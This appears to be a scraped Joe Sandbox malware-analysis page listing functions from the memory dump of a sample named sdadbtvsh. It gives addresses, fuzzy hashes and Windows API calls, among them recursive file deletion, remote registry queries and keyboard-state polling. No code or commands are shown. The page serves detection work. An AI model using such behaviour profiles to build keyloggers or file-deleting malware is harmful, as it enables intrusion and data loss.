Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction ID: 7017178bd6250319ec2a4abff98d649f900011827549289c7b501b8ecf69a327
Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction Fuzzy Hash: F90108B21047455FE3218E959845E59FFD8FB85370F250A1DE18497280FA707945C664

Uniqueness

Uniqueness Score: -1.00%

Function 005BE992 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c5d36067a08cde8a01dde37bb653f58a3d2d3e1b6e6e81f41361ea6f69ed7ab
Instruction ID: dcdab93f4332759ec03aaa62d9706e68047a390982f80989a369f8566ee8c4f8
Opcode Fuzzy Hash: 9c5d36067a08cde8a01dde37bb653f58a3d2d3e1b6e6e81f41361ea6f69ed7ab
Instruction Fuzzy Hash: 74F0AE32501A119AD6312AA59C0EBEA3F58BFD1374F190719F455921D1EF74F80685A1

Uniqueness

Uniqueness Score: -1.00%

Function 005C500D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,005C31B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 005C504E

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecdc03da4f6e8d73dda7e3baef069dfdcf3c967bac9a4aaf0340d9ac7fec91aa
Instruction ID: 08813a7ea2f49bfd7b0247e3e244a91b943cc0f4395c812d85d0be63dc8dbfc2
Opcode Fuzzy Hash: ecdc03da4f6e8d73dda7e3baef069dfdcf3c967bac9a4aaf0340d9ac7fec91aa
Instruction Fuzzy Hash: 2AF0B431601D25AEEB315EE29C0EF9A3F48FB807A1B144019AD04F6191EB60F88087E0

Uniqueness

Uniqueness Score: -1.00%

Function 005C3BB0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,005B6A99,?,0000015D,?,?,?,?,005B85D0,000000FF,00000000,?,?), ref: 005C3BE2

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 97cddb459133d92818b204ead4c13964cdc2e86d90cd4616a60020bb6afe2c46
Instruction ID: 0ee3f4d5edaf55541347e9bdc8e484a1946607b879cd671d2739e2eb0b515a03
Opcode Fuzzy Hash: 97cddb459133d92818b204ead4c13964cdc2e86d90cd4616a60020bb6afe2c46
Instruction Fuzzy Hash: 0CE0E5312046196FE7202AEA9C04F9A3E49FB417A4F158129FC05D6190DB64ED0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 005963DB Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84a7b844b18431c79d4ab48941ef8ef4ab6e2483e4ffc33c2ce6a2f831651bc4
Instruction ID: f129bbb14db7ccfed217a21ef247b9c1de797dd88298f4ef0a9918372a3719ca
Opcode Fuzzy Hash: 84a7b844b18431c79d4ab48941ef8ef4ab6e2483e4ffc33c2ce6a2f831651bc4
Instruction Fuzzy Hash: 45F0F271101B12CFCB359F68E498852BFE5BA1432A3248E2EE19B82620D731A884DB50

Uniqueness

Uniqueness Score: -1.00%

Function 005C510A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005C512C

Part of subcall function 005C2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,005CDB71,00661DC4,00000000,00661DC4,00000000,?,005CDB98,00661DC4,00000007,00661DC4,?,005CDF95,00661DC4), ref: 005C2D6E
Part of subcall function 005C2D58: GetLastError.KERNEL32(00661DC4,?,005CDB71,00661DC4,00000000,00661DC4,00000000,?,005CDB98,00661DC4,00000007,00661DC4,?,005CDF95,00661DC4,00661DC4), ref: 005C2D80

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction ID: 98fc139f86c77d4b4bfe9bda117ec0a35041d9294c0eee2bed7dd5123f272b04
Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction Fuzzy Hash: 39E092761007059F8721CFADD804B82BBE4EF95320724853DE89ED7220D371F852CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0059653A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00596558

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
Instruction ID: 4221b363127db15aab33f8cd985eea67609a366441a953173fddd51a9339608c
Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
Instruction Fuzzy Hash: 2DF0D47140020DBBDF05DF94C946AAE7FA9FB44318F208445F9159A251D336EA21EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00594154 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00594159

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
Instruction ID: 29be5859b39deca6892ec0b7bdb9000f4ff98326f279fd38f67df0d0c7b5cf4d
Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
Instruction Fuzzy Hash: 1AD052223424212AAA69213D2D0FCBF8E1CDBC2AA0B14403EFA02CA1AAE9445C0304A0

Uniqueness

Uniqueness Score: -1.00%

Function 005FE783 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 005FE7A2

Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: NamePathShort_wcslen
String ID:
API String ID: 2021730007-0
Opcode ID: ebe34213782033203345c0184df953fe04d7753eb1035c60a298a992acf569c7
Instruction ID: 155ef7eb1d899f283d1fbaf01e8afb1f8df27444a3545e603fa6cafc0ff92d6f
Opcode Fuzzy Hash: ebe34213782033203345c0184df953fe04d7753eb1035c60a298a992acf569c7
Instruction Fuzzy Hash: 92E0CD7650022557CB2092589C09FEA77DDEFC8790F040071FD09D7248DD64DD808690

Uniqueness

Uniqueness Score: -1.00%

Function 005939DE Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005939FD

Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 8a7f8cb5d0880cb51d823aa642649a03968641df6fd35677f71bc6071cb593d1
Instruction ID: f999b575616792583f3be06921d41bf6bfe01c7edff03cff0e46d734c4f6db41
Opcode Fuzzy Hash: 8a7f8cb5d0880cb51d823aa642649a03968641df6fd35677f71bc6071cb593d1
Instruction Fuzzy Hash: E6E0CD7650012557CB2092589C09FEA77DDEFC8790F040071FD09D7248DD64DD808690

Uniqueness

Uniqueness Score: -1.00%

Function 005FE753 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 005FE76C

Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: FolderPath_wcslen
String ID:
API String ID: 2987691875-0
Opcode ID: 81b11b783f3352e36b0c8e5b51f23f2748dbdb530dfcfdc509b95526fc1877b8
Instruction ID: a5dfb261a55afabca54de5c43153042d4d8de4d1a866978bf207adca49220616
Opcode Fuzzy Hash: 81b11b783f3352e36b0c8e5b51f23f2748dbdb530dfcfdc509b95526fc1877b8
Instruction Fuzzy Hash: 40D05EA19002292BDF60A6749C0DDBB3AACDB80214F0006A0786DD3182E934ED4586A0

Uniqueness

Uniqueness Score: -1.00%

Function 00597953 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,00000000,005D3A1C), ref: 00597973

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 336d193bbd1ff1aefb37fc3b3914bd90777447b1dd4fe04d4ceee2b47f7da026
Instruction ID: 0476dd64918f4d097f972ccb7a07d64a2a83061c38da96081d244eab0cd5870c
Opcode Fuzzy Hash: 336d193bbd1ff1aefb37fc3b3914bd90777447b1dd4fe04d4ceee2b47f7da026
Instruction Fuzzy Hash: D5E0B675414B12CFC7314F1AE804412FBF4FFD63613204A2FD4E582660D3B05886CB50

Uniqueness

Uniqueness Score: -1.00%

Function 005FDA5C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,005FD9DC,?,?), ref: 005FDA72

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: d69decf29016655abe227a87ba5726e5d5263a74325412ef05959b4ca6c3fcce
Instruction ID: 758489187a3a654e71a70d2e62dab295b4d8cd9bc8d3be7cc492bf1ed62d22d0
Opcode Fuzzy Hash: d69decf29016655abe227a87ba5726e5d5263a74325412ef05959b4ca6c3fcce
Instruction Fuzzy Hash: B8D0A7305D0208FBEF108B50CC03F99B76CE701B45F105194B201EA0D0C7B5A609A724

Uniqueness

Uniqueness Score: -1.00%

Function 005D073A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,005D0AA4,?,?,00000000,?,005D0AA4,00000000,0000000C), ref: 005D0757

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e6961cbb006f2604823bbf5453935b50ce67805648589ac71513a5532032cf1b
Instruction ID: 2232d925885301a60879c15e3cf6440ec39afbc67399a0a7c8bb037ae834f152
Opcode Fuzzy Hash: e6961cbb006f2604823bbf5453935b50ce67805648589ac71513a5532032cf1b
Instruction Fuzzy Hash: E2D06C3200010DBBDF128F84DD06EDA3BAAFB48714F014000BE1856020C732E832AB90

Uniqueness

Uniqueness Score: -1.00%

Function 005FE9C5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,005FD755), ref: 005FE9C6

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5d36e81d81308941d681f948049c5317627bee6967f5fa1b6bbe4ca3059edb80
Instruction ID: f2a3b188526865c07606874141380629757b81bd883e9425ad51f25e2459a401
Opcode Fuzzy Hash: 5d36e81d81308941d681f948049c5317627bee6967f5fa1b6bbe4ca3059edb80
Instruction Fuzzy Hash: 0FB09224001A1845BE780A381B1A0B92B0178533E67E82B95E6F9952F6C37D880BE620

Uniqueness

Uniqueness Score: -1.00%

Function 00606561 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 005FDB69: FindFirstFileW.KERNELBASE(?,?), ref: 005FDBE0
Part of subcall function 005FDB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 005FDC30
Part of subcall function 005FDB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 005FDC41
Part of subcall function 005FDB69: FindClose.KERNEL32(00000000), ref: 005FDC58

GetLastError.KERNEL32 ref: 00606583

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: f4936595e35d776a6833b403cb8c0f46c831b6ccfb867ef14d319cc0e527e348
Instruction ID: f96e94a57a0ba937ecfd073a663205acdde3bf4277708bae4e299dcbdb2d1eb1
Opcode Fuzzy Hash: f4936595e35d776a6833b403cb8c0f46c831b6ccfb867ef14d319cc0e527e348
Instruction Fuzzy Hash: 8FF082312005058FCF14EF59D859B6ABBE9BF89320F048049F94587351CB74BC018B94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0060A0FA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0060A11B
FindNextFileW.KERNEL32(00000000,?), ref: 0060A176
FindClose.KERNEL32(00000000), ref: 0060A181
FindFirstFileW.KERNEL32(*.*,?), ref: 0060A19D
SetCurrentDirectoryW.KERNEL32(?), ref: 0060A1ED
SetCurrentDirectoryW.KERNEL32(00657B94), ref: 0060A20B
FindNextFileW.KERNEL32(00000000,00000010), ref: 0060A215
FindClose.KERNEL32(00000000), ref: 0060A222
FindClose.KERNEL32(00000000), ref: 0060A232

Part of subcall function 005FE2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005FE2C9

Strings

*.*, xrefs: 0060A198

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 862eec6fd6feb59d2d70b289060c5b9267d15765f49734c6d21e71e994cf47b6
Instruction ID: d95b6bdb02d0744e899dbafd24099835859499f19f097c8934e8f3d36cc9b307
Opcode Fuzzy Hash: 862eec6fd6feb59d2d70b289060c5b9267d15765f49734c6d21e71e994cf47b6
Instruction Fuzzy Hash: 9831163124171E6ACB28AFE4EC09ADF77AEAF553A0F1401A1E810A22D1EB31DF45CA51

Uniqueness

Uniqueness Score: -1.00%

Function 0061C7A3 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0061D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0061C00D,?,?), ref: 0061D314
Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D350
Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D3C7
Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D3FD

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061C89D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0061C908
RegCloseKey.ADVAPI32(00000000), ref: 0061C92C
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0061C98B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0061CA46
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0061CAB3
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0061CB48
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0061CB99
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0061CC42
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0061CCE1
RegCloseKey.ADVAPI32(00000000), ref: 0061CCEE

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 85c151085c3275e6802e5d043fa2f69ba56bf997ebdca439450a5a14760f6a61
Instruction ID: 5d49ef80088895d1092543c34aa168e48a5744be3eec27b83deb78339868c45e
Opcode Fuzzy Hash: 85c151085c3275e6802e5d043fa2f69ba56bf997ebdca439450a5a14760f6a61
Instruction Fuzzy Hash: 93023E716042419FDB14DF24C895E6ABBE6FF88318F18849DE449CB3A2DB31ED46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 005FA54A Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 005FA572
GetAsyncKeyState.USER32(000000A0), ref: 005FA5F3
GetKeyState.USER32(000000A0), ref: 005FA60E
GetAsyncKeyState.USER32(000000A1), ref: 005FA628
GetKeyState.USER32(000000A1), ref: 005FA63D
GetAsyncKeyState.USER32(00000011), ref: 005FA655
GetKeyState.USER32(00000011), ref: 005FA667
GetAsyncKeyState.USER32(00000012), ref: 005FA67F
GetKeyState.USER32(00000012), ref: 005FA691
